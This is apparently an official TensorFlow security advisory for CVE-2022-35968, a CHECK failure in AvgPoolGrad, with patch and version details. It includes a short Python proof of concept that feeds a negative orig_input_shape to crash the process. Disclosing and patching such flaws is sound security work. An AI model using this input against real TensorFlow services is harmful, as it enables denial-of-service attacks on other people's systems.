## TFSA-2022-100: `CHECK` fail in `AvgPoolGrad`

### CVE Number
CVE-2022-35968

### Impact
The implementation of `AvgPoolGrad` does not fully validate the input `orig_input_shape`. This results in a `CHECK` failure which can be used to trigger a denial of service attack:
```python
import tensorflow as tf

ksize = [1, 2, 2, 1]
strides = [1, 2, 2, 1]
padding = "VALID"
data_format = "NHWC"
orig_input_shape = tf.constant(-536870912, shape=[4], dtype=tf.int32)
grad = tf.constant(.0890338004362538, shape=[1,5,7,1], dtype=tf.float64)
tf.raw_ops.AvgPoolGrad(orig_input_shape=orig_input_shape, grad=grad, ksize=ksize, strides=strides, padding=padding, data_format=data_format)
```

### Patches
We have patched the issue in GitHub commit [3a6ac52664c6c095aa2b114e742b0aa17fdce78f](https://github.com/tensorflow/tensorflow/commit/3a6ac52664c6c095aa2b114e742b0aa17fdce78f).

The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.


### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.


### Attribution
This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.
